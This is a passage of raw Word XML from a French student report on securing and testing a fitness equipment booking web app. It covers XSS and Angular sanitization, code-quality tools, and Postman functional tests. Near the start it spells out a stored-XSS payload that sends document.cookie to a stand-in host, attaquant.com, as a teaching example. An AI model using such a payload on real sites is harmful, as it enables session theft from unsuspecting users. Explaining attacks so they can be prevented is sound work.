          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>title</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Une image"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/&gt;&lt;script&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"http://attaquant.com/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>get.php?v</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>document</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>.cookie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;/script&gt;&lt;p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="008080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>class=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="DD1144"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="515151"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>/&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604CA6DF" w14:textId="7B6EBDF6" w:rsidR="00A74150" w:rsidRDefault="00A74150" w:rsidP="00A74150">
      <w:pPr>
        <w:pStyle w:val="paragraph"/>
        <w:ind w:firstLine="705"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Et lorsqu’un utilisateur accèdera à cette page tous les cookies de l’utilisateur seront envoyés vers le site de l’attaquant</w:t>
      </w:r>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r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AngularJS propose par défaut des mécanismes de protection contre les failles XSS. Pour cela </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Angular</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> procède à la </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Sanitization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">  de toutes les variables ayant pour fonction de capturer </w:t>
      </w:r>
      <w:bookmarkStart w:id="2" w:name="_GoBack"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">les entrées de l’utilisateur comme ici le champ description. Le principe de La </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="spellingerror"/>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Sanitization</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="normaltextrun"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>(désinfection) est d’encoder tout caractère Javascript ou HTML afin d’éviter leur exécution. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="eop"/>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="7B6AA111" w14:textId="77777777" w:rsidR="00A74150" w:rsidRDefault="00A74150" w:rsidP="00FA3DA1"/>
    <w:p w14:paraId="2E9B2D89" w14:textId="77777777" w:rsidR="00AF09D6" w:rsidRDefault="00C41B9A" w:rsidP="00CF6F55">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="122E9DB0" w14:textId="77777777" w:rsidR="00053246" w:rsidRDefault="00B81270" w:rsidP="00CA3CB6">
      <w:r>
        <w:t xml:space="preserve">Le codage des composants </w:t>
      </w:r>
      <w:r w:rsidR="00AE6042">
        <w:t xml:space="preserve">repose avant tout sur l’adoption de quelques </w:t>
      </w:r>
      <w:r w:rsidR="00053246">
        <w:t>bonnes pratiques :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21643644" w14:textId="77777777" w:rsidR="00CA3CB6" w:rsidRDefault="00F67528" w:rsidP="005515E7">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="00053246">
        <w:t>ocumenter le code source de ses composants</w:t>
      </w:r>
      <w:r w:rsidR="00C1218C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C1218C">
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidR="008B6978">
        <w:t xml:space="preserve"> Pour mon projet, j’ai utilisé l</w:t>
      </w:r>
      <w:r w:rsidR="00492DB4">
        <w:t xml:space="preserve">’outil </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00492DB4">
        <w:t>javadoc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00492DB4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B6978">
        <w:t xml:space="preserve">qui </w:t>
      </w:r>
      <w:r w:rsidR="00492DB4">
        <w:t>permet de générer une documentation technique</w:t>
      </w:r>
      <w:r w:rsidR="00C1218C">
        <w:t xml:space="preserve"> au format </w:t>
      </w:r>
      <w:r w:rsidR="00492DB4">
        <w:t>html.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C829391" w14:textId="77777777" w:rsidR="00B02E7D" w:rsidRDefault="008A0DC7" w:rsidP="00053246">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Soumettre les </w:t>
      </w:r>
      <w:r w:rsidR="00EA2E92">
        <w:t>méthodes de chaque de classe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> à des tests unitaires</w:t>
      </w:r>
      <w:r w:rsidR="007C6D63">
        <w:t>, c’est-à-dire vérifier qu’une donnée en entrée donne le résultat attendu.</w:t>
      </w:r>
      <w:r w:rsidR="005440F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005440F6">
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidR="005440F6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EA2E92">
        <w:t xml:space="preserve">Pour mon projet j’ai utilisé </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00492DB4">
        <w:t>junit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EA2E92">
        <w:t xml:space="preserve"> qui permet d’implémenter des batteries de tests unitaires.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5863D261" w14:textId="77777777" w:rsidR="008A0DC7" w:rsidRDefault="008A0DC7" w:rsidP="00053246">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Réaliser des jeux de tests fonctionnels pour valider les différents scénarios d’utilisation</w:t>
      </w:r>
      <w:r w:rsidR="00804085">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00804085">
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidR="00804085">
        <w:t xml:space="preserve"> ce point fera l’objet</w:t>
      </w:r>
      <w:r w:rsidR="003F40FB">
        <w:t xml:space="preserve"> de la présentation du jeu</w:t>
      </w:r>
      <w:r w:rsidR="00204AF7">
        <w:t xml:space="preserve"> d’essai fonctionnel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088AAFA1" w14:textId="77777777" w:rsidR="00804085" w:rsidRDefault="00804085" w:rsidP="00804085">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Effectuer un code </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Review</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> outre le souci de produire un code de qualité, l’intérêt d’une analyse du code est d’y trouver d’éventuels bugs et vulnérabilités avant la mise en production de l’application.</w:t>
      </w:r>
      <w:r w:rsidR="00A96A8C">
        <w:t xml:space="preserve"> Pour mon projet, j’ai utilisé l’utilitaire </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A96A8C">
        <w:t>Sonarqube</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A96A8C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B80658A" w14:textId="77777777" w:rsidR="008A0DC7" w:rsidRDefault="008A0DC7" w:rsidP="00053246">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Réaliser des tests de pénétrations </w:t>
      </w:r>
      <w:r w:rsidR="00204AF7">
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidR="00204AF7">
        <w:t xml:space="preserve"> ici on procède </w:t>
      </w:r>
      <w:r w:rsidR="002D2F7D">
        <w:t xml:space="preserve">à une analyse dynamique du code </w:t>
      </w:r>
      <w:r w:rsidR="00A96A8C">
        <w:t>en vue</w:t>
      </w:r>
      <w:r w:rsidR="002D2F7D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A96A8C">
        <w:t>d’</w:t>
      </w:r>
      <w:r w:rsidR="002D2F7D">
        <w:t xml:space="preserve">essayer </w:t>
      </w:r>
      <w:r w:rsidR="00A96A8C">
        <w:t>d’</w:t>
      </w:r>
      <w:r w:rsidR="002D2F7D">
        <w:t>identifier des</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vulnérabilités </w:t>
      </w:r>
      <w:r w:rsidR="00A96A8C">
        <w:t>de</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> l’application </w:t>
      </w:r>
      <w:r w:rsidR="002D2F7D">
        <w:t>par différentes techniques automatisées</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A96A8C">
        <w:t xml:space="preserve"> Pour mon projet, j’ai utilisé l’outil OWASP ZAP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C445DD" w14:textId="77777777" w:rsidR="00C1218C" w:rsidRDefault="00C1218C" w:rsidP="00C1218C">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:ind w:left="825"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FB8E3E2" w14:textId="77777777" w:rsidR="008A0DC7" w:rsidRDefault="008A0DC7" w:rsidP="008A0DC7">
      <w:pPr>
        <w:ind w:left="465"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530B4292" w14:textId="77777777" w:rsidR="00FF07EF" w:rsidRDefault="00FF07EF" w:rsidP="00CF6F55">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008E39B1">
        <w:t>Présentation d’un jeu d’essai</w:t>
      </w:r>
      <w:r w:rsidR="003F40FB">
        <w:t xml:space="preserve"> fonctionnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7205C356" w14:textId="77777777" w:rsidR="00CA3CB6" w:rsidRDefault="00505A44" w:rsidP="00505A44">
      <w:pPr>
        <w:ind w:firstLine="283"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Après avoir effectué les </w:t>
      </w:r>
      <w:r w:rsidR="000D5378">
        <w:t xml:space="preserve">tests </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">unitaires à l’échelle d’une classe, un jeu d’essai fonctionnel permet de tester les fonctionnalités à l’échelle de l’application. Pour ce faire, j’ai utilisé </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>postman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> pour élaborer des scénarios d’utilisation correspondant à une fonctionnalité</w:t>
      </w:r>
      <w:r w:rsidR="008B7D4A">
        <w:t xml:space="preserve"> utilisateur (UC). </w:t>
      </w:r>
      <w:r w:rsidR="00345B39">
        <w:t xml:space="preserve">Dans le cas de l’application Smart </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00345B39">
        <w:t>Firtness</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00345B39">
        <w:t xml:space="preserve">, la réservation d’un équipement par un utilisateur entraîne </w:t>
      </w:r>
      <w:r w:rsidR="00253F8C">
        <w:t xml:space="preserve">sa non </w:t>
      </w:r>
      <w:r w:rsidR="00D666D5">
        <w:t>disponibilité</w:t>
      </w:r>
      <w:r w:rsidR="00253F8C">
        <w:t xml:space="preserve"> pour </w:t>
      </w:r>
      <w:r w:rsidR="00D666D5">
        <w:t>les autres utilisateurs. Par exemple si le parc est composé de trois elliptiques et qu’un utilisateur en réserve un à une certaine tranche horaire</w:t>
      </w:r>
      <w:r w:rsidR="00F2520B">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00D666D5">
        <w:t xml:space="preserve"> la page de réservation </w:t>
      </w:r>
      <w:r w:rsidR="00720231">
        <w:t xml:space="preserve">doit indiquer qu’il y a deux </w:t>
      </w:r>
      <w:r w:rsidR="00D666D5">
        <w:t>ell</w:t>
      </w:r>
      <w:r w:rsidR="00720231">
        <w:t>iptiques</w:t>
      </w:r>
      <w:r w:rsidR="00D666D5">
        <w:t xml:space="preserve"> de di</w:t>
      </w:r>
      <w:r w:rsidR="00720231">
        <w:t>sponible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6223B473" w14:textId="77777777" w:rsidR="00D666D5" w:rsidRDefault="00D7613C" w:rsidP="00D7613C">
      <w:pPr>
        <w:ind w:firstLine="283"/>
      </w:pPr>
      <w:r>
        <w:t>Postman 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ECE8383" w14:textId="77777777" w:rsidR="00D666D5" w:rsidRDefault="00D666D5" w:rsidP="00505A44">
      <w:pPr>
        <w:ind w:firstLine="283"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Mais si l’utilisateur </w:t>
      </w:r>
      <w:r w:rsidR="00D348FE">
        <w:t>annule sa commande</w:t>
      </w:r>
      <w:r w:rsidR="00F2520B">
        <w:t>, la page de réser</w:t>
      </w:r>
      <w:r w:rsidR="00D7613C">
        <w:t xml:space="preserve">vation doit de nouveau proposer 3 elliptiques à la réservation. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2397E300" w14:textId="77777777" w:rsidR="00D7613C" w:rsidRPr="00CA3CB6" w:rsidRDefault="00D7613C" w:rsidP="00505A44">
      <w:pPr>
        <w:ind w:firstLine="283"/>
      </w:pPr>
      <w:r>
        <w:t>Postman 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EC4980" w14:textId="77777777" w:rsidR="00411FB4" w:rsidRPr="00411FB4" w:rsidRDefault="00411FB4" w:rsidP="00411FB4">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="160"/>
        <w:ind w:left="360" w:firstLine="348"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:eastAsia="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47CC6673" w14:textId="77777777" w:rsidR="00310748" w:rsidRDefault="00310748" w:rsidP="004872A2"/>
    <w:p w14:paraId="07833767" w14:textId="77777777" w:rsidR="008C6A0D" w:rsidRDefault="008C6A0D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF113ED" w14:textId="77777777" w:rsidR="007652F6" w:rsidRDefault="007652F6" w:rsidP="007652F6"/>
    <w:p w14:paraId="6E965D10" w14:textId="77777777" w:rsidR="007652F6" w:rsidRDefault="007652F6" w:rsidP="00CF6F55">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007652F6">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Présentation d’une recherc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>he effectuée à partir d’un site anglophone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="197D1338" w14:textId="77777777" w:rsidR="007652F6" w:rsidRDefault="007652F6" w:rsidP="007652F6"/>
    <w:p w14:paraId="6E570E1A" w14:textId="77777777" w:rsidR="008E39B1" w:rsidRDefault="00246930" w:rsidP="008E39B1">
      <w:r>
        <w:rPr>
          <w:color w:val="A8D08D" w:themeColor="accent6" w:themeTint="99"/>
        </w:rPr>
        <w:t xml:space="preserve">//TO DO </w:t>
      </w:r>
      <w:r>
        <w:t>A traduire</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC4F595" w14:textId="77777777" w:rsidR="00913997" w:rsidRDefault="00C2214C" w:rsidP="008E39B1">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00913997">
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00913997" w:rsidRPr="00913997">
        <w:t>implements</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00913997" w:rsidRPr="00913997">
        <w:t xml:space="preserve"> http basic </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00913997" w:rsidRPr="00913997">
        <w:t>authentication</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00913997" w:rsidRPr="00913997">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00913997" w:rsidRPr="00913997">
        <w:t>angular</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00913997">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00913997">
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidR="00913997">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidR="00913997">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>https://medium.com/@rameez.s.shaikh/angular-7-spring-boot-basic-authentication-example-98455b73d033</w:t>
        </w:r>
